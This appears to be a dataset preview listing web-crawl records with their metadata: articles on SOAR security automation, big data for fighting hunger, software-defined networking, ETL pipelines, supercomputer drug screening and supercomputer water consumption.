These capabilities, however, render companies more vulnerable to mega hacks, as hackers have more access points and digital infrastructure vulnerabilities.
Across the globe, we are more aware than ever now of how hackers can circumvent cloud authentication. And yet most cybersecurity solutions do not provide a sufficient degree of automation to respond to all of the potential threats in the most efficient way possible.
By 2023, the demand for incident response is expected to grow to $33.76 billion, from $13.38 billion in 2018. Some remedies are more effective than others.
For organizations to respond to security incidents more efficiently, SOAR (security orchestration, automation, and response) provides the most comprehensive solution.
SOAR technology enables enterprises to respond to many threats without human interference by leveraging artificial intelligence (AI) and machine learning (ML) and drawing on vast volumes of data.
Here’s what makes SOAR security such an effective approach to cybersecurity:
On an average, organizations have 50 resources available to handle their security infrastructure. It forces analysts to track several instruments simultaneously on an ongoing basis, with controls functioning independently of each other. It produces unequal response mechanisms, including instances in which response times are widely varying, and in the worst of situations, absolute chaos.
SOAR tools allow businesses to incorporate their entire security infrastructure into a single platform. This way, in a defensive plan, elements are able to interact and work together. This not only means greater network visibility, but also means fewer and more cybersecurity-related strategic alerts.
Orchestration and Automation
Threats to cybersecurity come in different forms, some more nuanced than others. SOAR's strategy is to recognize all threats and to automate as many of them as possible.
Email phishing is a classic example. While many systems require an analyst to flag potentially threatening messages manually during a phishing attempt, a SOAR cybersecurity allows organizations to flag potentially nefarious messages automatically without human effort.
Strategic and Actionable Insights
SOAR solutions give a leg up, except for events that can not be completely automated. SOAR platforms not only provide companies with actionable insights when an event happens through ML algorithms, but also help locate individual workers in an organization who have faced similar challenges and solved them. The efficiency that’s created through these capabilities could mean a difference of tens of millions of dollars when a mega breach occurs.
Leaner and Smarter Cyber Security Teams
The cybersecurity talent shortage has been described as a "crisis," which is "getting worse." A SOAR cybersecurity strategy encourages analysts to work smarter, allowing them to spend their resources on projects that need more analytical energy and imagination. This implies that companies can do more with fewer resources, and the lack of cybersecurity expertise immediately becomes a non-issue.
Analysts are empowered on a SOAR product with a comprehensive workspace and a range of instruments that can help them decide on strategies for remediation and escalation.
No organization is impervious to the challenges posed by cloud computing and IoT, whether private, public or otherwise. The longer it takes for a company to respond to a mega breach, the more dire the financial effects of the breach.
Both stakeholders are responsible for implementing security approaches that are just as mature as the technologies they represent. etting more instruments, more dashboards, and more alarms ultimately do not make a security strategy more effective.
Automated alert triage
It has become increasingly difficult for analysts to keep up with the speed of incoming warnings due to lengthy incident management procedures.
In one location, SOAR automation aggregates these warnings while enriching them with added meaning to improve resolution time. It also helps decrease the amount of "false-positive" warnings and advanced case management features that help identify, direct and speed up investigations.
SOAR orchestration streamlines common SOC tasks such as warning ingestion, severity level-based prioritization, task assignment, and subroutines.
More complex exchange-to-exchange (E2E) activities, such as triage, enrichment, inquiry, and remediation, are also automated cohesively.
This is done by automatically correlating warnings from around a security stack into a single incident, centralizing the security processes.
These advanced capabilities of integration and automation help alleviate many of the common burdens associated with warning fatigue.
In turn, SOC analysts should concentrate on threat hunting, thus reducing workloads and exposure to an active threat of a breach.
Augmenting the SOC to Accelerate Incident Response
The presence of multiple manual workflows impedes warning investigations and increases the time needed for resolution while raising the likelihood of human errors and oversights. Organizations are not necessarily operationally inefficient in this situation; they are just at increased risk of infringement.
The remedy is to increase the SOC by leveraging SOAR technology to improve the logging and reporting automation functionality and the security information and event management (SIEM) solutions. This results in rigorous orchestration and automation of all SOC processes and an increase in overall security.
Security teams can improve productivity by automating, changing, or upgrading every job according to the needs of the organization.
SOAR software solutions can automate a single agency, increase the entire SOC and improve overall security.
SOAR security tool is extraordinarily customizable. Any response and subroutine can be automated by security teams. They can even set threshold conditions under which SOAR can take an offline identity and exploit its built-in playbooks and connectors to achieve the optimum response to an incident.
SPORACT by Anlyz gathers information for organizations from various sources, helps them understand the data, and optimizes security processes, while providing an automated response. The analytical capabilities of SPORACT allow security operations teams to track, evaluate and terminate threats. Data insights allow the team to understand the current cybersecurity environment through threat categories.
Overall, SPORACT helps CISOs and leadership teams develop better strategies for holistic security incident response management around entities, processes and technology. You can check out SPORACT’s features here. | <urn:uuid:11dcd276-b5a1-40c2-9323-41106d878944> | CC-MAIN-2022-40 | https://anlyz.co/why-soar-good-bet-fighting-mega-cyber-security-breaches/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00141.warc.gz | en | 0.939175 | 1,405 | 2.59375 | 3 |
Using Big Data To Prevent World Hunger
Hunger and famine are two of the leading indicators of serious poverty. In October 2013 the Global Hunger Index released its latest report, indicating nineteen countries suffer from levels of hunger that are either ‘alarming’ or ‘extremely alarming’, with one in eight people suffering from chronic undernourishment between 2010 and 2012.
Although farmers today produce three times as much food as they did fifty years ago, farmers still have to significantly improve their productivity to help feed a world population of 9 billion in 2050. Leaders of the G8 believe an important step towards solving the problem is to allow farmers, scientists, and entrepreneurs unrestricted access to agricultural big data.
Big data analysis can increase crop yields by helping farmers make better decisions about when to plant, manage and harvest their crops. Beyond broad data sets on topics such as rainfall levels, signs of pests and diseases, and anticipated prices at local markets, there is also the highly specialised and specific data sets such as plant genomics and local weather conditions.
The Climate Corporation operates a cloud-based farming information system that takes weather measurements from 2.5 million locations and combines it with 150 billion soil observations to generate 10 trillion weather simulation data points. This information allows farmers to know information as diverse as when is the best time to spray fields to getting an accurate estimate of the value of fields they may be considering buying.
The end goal is to help improve productivity in Africa, the worst performing agricultural producer. The CGIAR Consortium in France hopes to develop an app which uses all the available data to allow African farmers to identify their local soil type, the planting and harvesting requirements of each specific field, and then direct them to where they can locally purchase the seeds needed.
Using big data to aid the battle against hunger isn’t a new idea. The Famine Early Warning System has been in operation for 25 years to help international aid groups predict where famines in remote regions are about to occur and thus target the $1.5 billion of annual food aid from the U.S. Agency for International Development.
The system relies on a blend of social and scientific big data from federal agencies as diverse as NASA, the National Oceanic and Atmospheric Administration, and the Department of Agriculture to create hydrological models, food-economics forecasts, weather and climate simulations, and food-borne illness predictions. The output from these models is increasingly accurate and allows the world’s political leaders respond quickly and effectively in the early stages of a famine.
What is the future of big data in farming? Is it naïve to believe that data sets alone can solve the issue of world hunger, or are they the developed world’s best hope of fighting famine? Let us know in the comments below.
By Daniel Price
Daniel is a Manchester-born UK native who has abandoned cold and wet Northern Europe and currently lives on the Caribbean coast of Mexico. A former Financial Consultant, he now balances his time between writing articles for several industry-leading tech (CloudTweaks.com & MakeUseOf.com), sports, and travel sites and looking after his three dogs. | <urn:uuid:72604398-8b80-48bd-91f2-9557052f6dd0> | CC-MAIN-2022-40 | https://cloudtweaks.com/2014/03/using-big-data-prevent-world-hunger/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00141.warc.gz | en | 0.939638 | 654 | 3.4375 | 3 |
Software-defined networking (SDN) is a method of networking that leverages software-based controllers or application programming interfaces (APIs) to oversee traffic on the network and communicate with the core hardware infrastructure.
This differs from legacy networks which use dedicated hardware assets (routers and switches) to monitor network traffic. SDN can generate and control a virtual network or control a traditional hardware network with software that automates and regulates the provisioning and management of network resources.
While network virtualization provides the ability to divide virtual networks in a physical network or connect devices on multiple physical networks within a single virtual network, software-defined networking facilitates a novel way to control the routing of data packets through a centralized server.
How Does Software-Defined Networking (SDN) Work?
In an SDN, the software is decoupled from the hardware. SDN then separates the two network device planes, shifting the control plane which decides where to send traffic to software, and leaving behind the data plane that accelerates the traffic in the hardware. This allows network administrators to control the network intelligently and centrally using software applications or programs to manage the entire network consistently and holistically rather than a device-by-device basis.
Applications connect resource requests or information about the network. Controllers use the information from these applications to decide how to route a data packet. Networking devices then collect information from the controller and decipher where to move the data.
These three elements can often be located in different physical spaces.
Physical or virtual networking devices move data across the network. In some cases, virtual switches may be entrenched in either the software or the hardware, can take over the duties of physical switches and merge their tasks into a single intelligent switch. The switch then verifies the reliability of both the data stacks and their virtual machine destinations and pushes the packets along.
Benefits of Software-Defined Networking (SDN)
SDN provides a range of benefits over legacy networking that includes:
Enhanced Control with Better Speed and Flexibility: Rather than manually programming multiple vendor-specific hardware tools, SDN allows monitoring the flow of traffic over a network easily by programming an open standard software-based controller. Networking administrators also have more options when choosing networking devices as they can choose an open-source code to communicate with any number of hardware tools through a central controller.
Customizable Network Infrastructure: With software-defined networking, administrators can design network services and allot virtual resources to change the network infrastructure in real-time through one central location. This allows network admins to augment the flow of data through the network, focusing on applications that require more availability.
Robust Security: A software-defined network enables visibility into the entire network, providing a better view of security threats. With the spread of smart devices that connect to the internet, SDN offers clear advantages over legacy networking solutions. Developers can create distinct zones for devices that need different levels of security, or instantly quarantine infected devices so they cannot compromise the rest of the network and devices.
How is SDN Different From Traditional Networking?
The biggest difference between SDN and legacy networking is infrastructure. SDN is software-enabled, whereas legacy networking is hardware-based. Because SDN’s are software based, the control panel is much more flexible than traditional/legacy networking. It allows admins monitor the network, alter configuration settings, deliver resources, and enhance network capacity—all from a unified user interface, without adding additional hardware.
There are also security disparities between SDN and traditional networking. Thanks to greater adoption rates and the ability to describe secure pathways, SDN offers improved security in several ways. However, as software-defined networks use a central controller, securing the controller is key to maintaining a secure network and this single point of failure characterizes a potential vulnerability of SDN.
What are The Different Models of SDN?
While the practice of a centralized software controlling the flow of data in switches and routers applies to all software-defined networking, there are different models of SDN, as defined below:
Open SDN: Network administrators employ a protocol like OpenFlow to regulate the performance of virtual and physical switches at the data plane level.
SDN by APIs: Rather than utilizing an open protocol, application programming interfaces regulate how data travels through the network on each device.
SDN Overlay Model: This is another type of software-defined networking which operates a virtual network on top of active hardware infrastructure, creating dynamic tunnels to various on-premise and remote data centers. The virtual network assigns bandwidth over an array of channels and allocates devices to each channel, leaving the physical network untouched.
Hybrid SDN: This model unites software-defined networking with traditional/legacy networking practices in one environment to support diverse functions on a network. Standard networking protocols continue to direct traffic, while SDN takes up onus for other traffic, letting network administrators to create SDN in stages to a legacy environment.
ISSQUARED and Infrastructure
ISSQUARED Inc. a leading IT infrastructure, managed services, and cybersecurity firm offer a detailed set of integrated Infrastructure services, aimed at keeping your business secure, scalable and reliable. A list of our Infrastructure services includes:
Service Request Management
Problem Management Support
24/7 Operations Monitoring
Virtualized Desktop Infrastructure
Real-time and Historial Reporting.
For more information on ISSQAURED's Infrastructure services, please reach out to +1 (805) 480-9300 or drop an email at firstname.lastname@example.org. To read more about our Infrastructure offerings, click here
ISSQUARED editors publish insights, articles, and news on emerging technologies and innovations across Cybersecurity, Cloud, Hyperconvergence, Edge Computing, Identity Management, Unified Communication, and many more. We aim to provide thoughtful and actionable technological information for today’s IT decision-makers and help them reduce the risk of making the wrong decision by relying on data and experts analysis. | <urn:uuid:faeb62e2-731e-4d53-8631-6762ca1a2d10> | CC-MAIN-2022-40 | https://es.issquaredinc.com/insights/resources/blogs/software-defined-networking | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00141.warc.gz | en | 0.878461 | 1,276 | 3.890625 | 4 |
Recently, there has been a lot of talk about whether ETL is still a necessary activity in the modern data architecture and whether ETL should be abandoned in favor of modern techniques such as data wrangling, in memory transformations and in memory databases. Turns out, ETL is more important than ever and though it can look slightly different (e.g. data warehouses can be too restrictive), it continues to play an extremely important role in the data value generation process.
ETL – short for Extract, Transform, Load – is made up of these three key stages of Extract, Transform and Load. Extract is the process of collecting data from the data source, transform is the process of processing the data to convert it into the form suitable for the required use case and Load is the process of moving the data into a data storage layer that can power the required data use case.
ETL is not dead. In fact, it has become more complex and necessary in a world of disparate data sources, complex data mergers and a diversity of data driven applications and use cases.
Extract is the process of collecting data from all required data sources. Data sources come in many shapes and sizes ranging from RDBMS systems to APIs to file shares or from public to private sources or from paid to free data sources. Data sources can contain PII (personally identifiable information) or could contain enterprise IP (Intellectual Property). Data sources can be messy, unstructured or structured and well described. Data sources can generate data at varied frequencies or constantly produce data through data streams. Data sources can support “pull” data mechanisms or “push” data mechanisms both synchronously or asynchronously.
This means that the extract part of modern ETL needs to be extremely flexible, resilient and malleable to support the diversity of data sources and the variations in data extraction procedures and protocols. Modern data architectures need to be able to connect to multiple data sources in parallel and extract data to make it available to downstream processing without impacting other extract process’ resilience.
Transform is the process where data is read from its raw form and transformed into the form where it is ready for usage in multiple types of scenarios. Transformation is probably the part of ETL that has changed the least however technology advances have made this part of the process more resilient, stable and efficient. Transformation comprises of three key subparts
The first type of transformation process is the determination and qualification of various data as being high quality, complete and acceptable. Here, the system needs to ensure that the various data points are complete, adhere to the schema that is expected and do not contain data that is not readable or is corrupted and incoherent. Another type of data quality check uses past patterns of data associated with a data set to determine whether there have been unexpected changes in the data that is newly arrived when compared to past arrivals. If any such changes are noticed, the data quality can be marked as suspect.
The second type of transformation process ensures that the data is deemed appropriate according the business quality requirements of the intended analysis of the data. Here the data is inspected for and analyzed for completeness from a business relevancy perspective and if the data is found to be missing key elements that are required for powering business workflows, the data is marked suspect.
The third type of transformation process ensures that data is processed to take the shape required by the business purpose of the data analysis. Here data can be aggregated, cubed, filtered, sampled, processed through algorithms to produce a transformed data set that is primed to support the intended business use case.
Because the same data can be used for multiple business use cases, transformations typically take a one to many relationship, with one data set being transformed multiple times through multiple business logic to produce multiple transformed data sets.
Load in ETL has gone through major changes in approach especially with the advent of polyglot storage — where storage is designed to best empower the specific data scenario be it analytics, search, alerting, visibility etc. Load in modern data architectures can, in parallel, load the same data into multiple different types of storage technologies to power the end user and customer applications as needed by business requirements.
In modern load architectures, it is important that the system be able to simultaneously stream and load data into multiple technology stacks, again without hurting or impacting the resiliency and quality of other parallel loads.
Though the nature of ETL has changed, the idea of ETL has not become stale or irrelevant. There is an ever-increasing list of options for ETL which is a sign that the ETL Tools market is not only existent but growing. Especially with CIOs under more pressure to drive higher quality and value from their data through application of AI and machine learning technologies to data, modern ETL becomes a significant part of any data architecture. ETL is not dead. Just more complex, harder and significant. | <urn:uuid:29dbb3bf-5ab1-4e8b-a6de-6ce1a711f32a> | CC-MAIN-2022-40 | https://www.cio.com/article/227943/is-etl-dead-in-the-age-of-ai-not-quite.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00141.warc.gz | en | 0.9289 | 1,011 | 2.921875 | 3 |
Despite the highly profitable nature of the pharmaceutical business and the large amount of R&D money companies throw at creating new medicines, the pace of drug development is agonizingly slow. Over the last few years, on average, less than two dozen new drugs have been introduced per year. One of the more promising technologies that could help speed up this process is supercomputing, which can be used not only to find better, safer drugs, but also to weed out those compounds that would eventually fail during the latter stages of drug trials.
According to a 2010 report in Nature, big pharma spends something like $50 billion per year on drug research and development. (To put that in perspective, that’s four to five times the total spend for high performance computing.) The Nature report estimates the price tag to bring a drug successfully to market is about $1.8 billion, and rising. A lot of that cost is due to the high attrition rate of drugs, which is caused by problems in absorption, distribution, metabolism, excretion and toxicity that gets uncovered during clinical trials.
Ideally, the drug makers would like know which compounds were going to succeed before they got to the expensive stages of development. That’s where high performance computing can help. The approach is to use molecular docking simulations on the computer to determine if the drug candidate can bind to the target protein associated with the disease. The general idea is to find the key (the small molecule drug) that fits in the lock (the protein).
AutoDock, probably the most common molecular modeling application for protein docking, is a one of the more popular software package used by the drug research community. It played a role in developing some of the more successful HIV drugs on the market. Fortunately, AutoDock is freely available under the GNU General Public License.
The trick is to do these docking simulations on a grand scale. Thanks to the power of modern HPC machines, millions of compounds can now be screened against a protein in a reasonable amount of time. In truth, that timeframe is dependent upon how many cores you can put to the task. For a typical medium-sized cluster that a drug company might have in-house, it would take several weeks to screen just a few thousand compounds against one target protein. To reach a more interactive workflow, you need a something approaching a petascale supercomputer.
But not necessarily an actual supercomputer. Compute clouds have turned out to be very suitable for this type of embarrassing parallel application. For example, in a recent test with 50,000 cores on Amazon’s cloud (provisioned by Cycle Computing), software was able to screen 21 million compounds against a protein target in less than three hours.
Real supercomputers work too. At Oak Ridge National Lab (ORNL), researchers there used 50,000 cores of Jaguar to screen about 10 million drug candidates in less than a day. Jeremy C. Smith, director of the Center for Molecular Biophysics at ORNL, believes his type level of virtual screening is the most cost-effective approach to turbo-charge the drug pipeline. But the real utility of the supercomputing approach, says Smith, is that it can also be used to screen out drugs with toxic side effects.
Toxicity is often hard to detect until it comes time to do clinical trials, the most expensive and time-consuming phase of drug development. Worse yet, sometimes toxicity is not discovered until after the drug has been approved and released into the wild. So identifying these compounds early has the potential to save lots of money, not to mention lives. As Smith says, “If drug candidates are going to fail, you want them to fail fast, fail cheap.”
At the molecular level, toxicity is caused by a drug binding to the wrong protein, one that is actually needed by the body, rather than just selectively binding to the protein causing the condition. The problem is humans have about a thousand proteins, so every potential compound needs to be checked against each one. When you’re working with millions of drug candidates, the job becomes overwhelming, even for the petaflop supercomputers of today. To support the toxicity problem, you’ll need an exascale machine, says Smith.
Besides screening for toxicity, the same exascale setup can be used to repurpose existing drugs for other medical conditions. That is, the drug docking software could use approved drugs as the starting point and try to match them against various target proteins know to cause disease. Right now, drug repurposing is typically discovered on a trial-and-error basis, but the increasing number of compounds that are now in this multiple-use category suggests this could be rich new area of drug discovery.
In any case, sheer compute power is not the complete answer. For starters, the software has to be scaled up to the level of the hardware, and on an exascale machine, that hardware is more than likely going to be based on heterogenous processors. But since the problem is easily parallelized (each docking operation can be performed independently of one another), at least the scaling aspect should be relatively easy to overcome.
The larger problem is that the molecular modeling software itself is imperfect. Unlike a true lock and key, proteins are dynamic structures, and the action of binding to a molecule changes their shape. Therefore, physics simulation is also required to get a more precise match.
AutoDock, for example, is only able to provide a crude match between drug and protein. To get higher fidelity docking, more compute-intensive algorithms are required. Researchers, like those at ORNL, often resort to more precise molecular dynamics codes after getting performing a crude screening run with AutoDock.
None of this is a guarantee that virtual docking on exascale machines is going to launch a golden age of drugs. It’s possible that researchers will discover that there are just a handful of small molecule compounds that actually exhibit both disease efficacy and are non-toxic. But Smith believes this approach is full of promise. “This is the way to design drugs since this mirrors the way nature works,” he says. | <urn:uuid:4d656fbb-923f-4889-90af-53ce9894af81> | CC-MAIN-2022-40 | https://www.hpcwire.com/2012/07/31/drug_discovery_looks_for_its_next_fix/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00342.warc.gz | en | 0.95818 | 1,259 | 3.03125 | 3 |
Water scarcity has been surfacing as an extremely critical issue worth addressing in the U.S. as well as around the globe nowadays. A McKinsey-led report shows that, by 2030, the global water demand is expected to exceed the supply by 40%. According to another recent report by The Congressional Research Service (CRS), more than 70% of the land area in the U.S. underwent drought condition during August, 2012.
When it comes to 2014, the condition has become even worse in some of the states: following a three-year dry period, California declared state-wide drought emergency. A report by NBC News on this drought quotes California Gov. Jerry Brown as saying, “perhaps the worst drought California has ever seen since records began being kept about 100 years ago”. Many such evidences of extended droughts and water scarcity have undoubtedly necessitated concerted approaches to tackling the global crisis and ensuring water sustainability.
Supercomputers are notorious for consuming a significant amount of electricity, but a less-known fact is that supercomputers are also extremely “thirsty” and consume a huge amount of water to cool down servers through cooling towers that are typically located on the roof of supercomputer facilities. While high-density servers packed in a supercomputer center can save space and/or costs, they also generate a large amount of heat which, if not properly removed, could damage the equipment and result in huge economic losses.
The high heat capacity makes water an ideal and energy-efficient medium to reject server heat into the environment through evaporation, an old yet effective cooling mechanism. According to Amazon’s James Hamilton, a 15MW data center could guzzle up to 360,000 gallons of water per day. The U.S. National Security Agency’s data center in Utah would require up to 1.7 million gallons of water per day, enough to satiate over 10,000 households’ water needs.
Although water consumption is related to energy consumption, they also differ from each other: due to time-varying water efficiency resulting from volatile outside temperatures, the same amount of server energy but consumed at different times may also result in different amount of water evaporation in cooling towers. In addition to onsite cooling towers, the enormous appetite for electricity also holds supercomputers accountable for offsite water consumption embedded in electricity production. As a matter of fact, electricity production accounts for the largest water withdrawal among all sectors in the U.S. While not all the water withdrawal is consumed or “lost” via evaporation, the national average water consumption for just one kWh electricity still reaches 1.8L/kWh, even excluding hydropower which itself is a huge water consumer.
Amid concerns over the tremendous amount of water required to run data centers and supercomputers, there have been an increasing interest in mitigating the water consumption. For example, Facebook and eBay have developed dashboard to monitor the water efficiency (Water Usage Efficiency or WUE in short) in run-time, while Google and NCAR-Wyoming Supercomputing Center (NWSC) are developing water-efficient cooling technologies, such as using outside air cooling, using recycled water and so on. These approaches, however, are merely targeting facility or infrastructure improvement, and they require high upfront capital investment and/or suitable climate conditions.
Why should supercomputers really care about water consumption? Well, there are a good number of reasons. Water conservation will not only benefit supercomputers in receiving tax credits and saving a portion of their annual utility bills, but also improve sustainability of supercomputers and help it survive extended droughts which are more and more frequent in water-stressed areas such as California where many large data centers and supercomputers are located. Water conservation will also benefit supercomputers in acquiring green certification, fulfilling their social responsibilities.
Motivated by the dearth of thorough research in supercomputer water efficiency and urgency of water conservation, a group of researchers at Florida International University have recently been targeting the field of data center and supercomputer water conservation. Unlike the current water-saving approaches which primarily focus on improved “engineering” and exhibit several limitations (such as high upfront capital investment and suitable climate), the research group devises software-based approaches to mitigate water consumption in supercomputers by exploiting the inherent spatio-temporal variation of water efficiency. Such spatio-temporal variation of water efficiency comes from our mother nature for free: volatile temperature results in time-varying water efficiency, while heterogeneous supercomputer systems across different locations lead to spatio variation of water efficiency.
The research group finds that the spatio-temporal variation of water efficiency is also a perfect fit for supercomputers’ workload flexibility: migrating workloads to locations with higher water efficiency and/or deferring workloads to water-efficient times. Effectiveness of the approach has been demonstrated via extensive experiment studies, reducing water consumption by 20% with almost no compromise in other aspects such as service latency. The promising results mark the first step to make a far-reaching change in the process of achieving supercomputer sustainability through water conservation, yet without upfront capital investment or facility upgrades.
If you operate a supercomputer in water-stressed areas undergoing drought conditions, the software-based approach may help your supercomputer survive droughts without costing you a single cent on facility upgrades.
Shaolei Ren received his Ph.D. from the University of California, Los Angeles, in 2012 and is currently with Florida International University as an Assistant Professor, where he works on research teams that target the issues as described above. His research focuses on sustainable computing. He has written about sustainable HPC datacenters in the past, including for a featured selection for our “SC Research Highlights” from 2013, which can be found here. | <urn:uuid:790ce9d6-9936-410c-9187-7fba4bc4537e> | CC-MAIN-2022-40 | https://www.hpcwire.com/2014/01/26/can-supercomputers-survive-drought/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00342.warc.gz | en | 0.952023 | 1,200 | 3.6875 | 4 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.